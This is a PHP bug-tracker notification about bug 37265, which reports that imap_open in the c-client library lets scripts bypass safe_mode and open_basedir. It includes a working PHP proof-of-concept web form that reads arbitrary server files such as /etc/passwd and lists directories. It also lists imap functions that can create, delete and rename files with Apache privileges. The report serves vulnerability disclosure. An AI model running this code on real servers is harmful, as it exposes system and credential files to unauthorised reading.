ID: 37265
Updated by: [EMAIL PROTECTED]
Reported By: Challii at btinternet dot com
-Status: Open
+Status: Assigned
Bug Type: IMAP related
Operating System: RHE3
PHP Version: 4.4.2
-Assigned To:
+Assigned To: ilia
New Comment:
Assigned to Ilia on his request.
Previous Comments:
------------------------------------------------------------------------
[2006-05-02 18:46:16] challii at btinternet dot com
The underlying system has to be able to access different files based on
the overlying system configuration and where mailboxes are etc.
The problem lies in the fact that the imap_body doesn't adhere to the
php_openbasedir restrictions.
------------------------------------------------------------------------
[2006-05-01 19:28:50] judas dot iscariote at gmail dot com
a PHP dev can correct me if Im wrong, but this is not a PHP bug.
if the mail_open() function of the c-client library allows to read
arbitrary files on the server, it's not precisely a PHP problem right
?
php extension can do what the underlying library API permits.
------------------------------------------------------------------------
[2006-05-01 17:02:12] Challii at btinternet dot com
Description:
------------
Vulnerability in c-client library (tested with versions
2000,2001,2004), mail_open
could be used to open stream to local files.
For php and imap module
imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively
list a directory.
s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.
Reproduce code:
---------------
##### code #####
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>
<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
################
Expected result:
----------------
That the file could not be accessed due to a security permission
Actual result:
--------------
The ability to see any file on the server.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=37265&edit=1
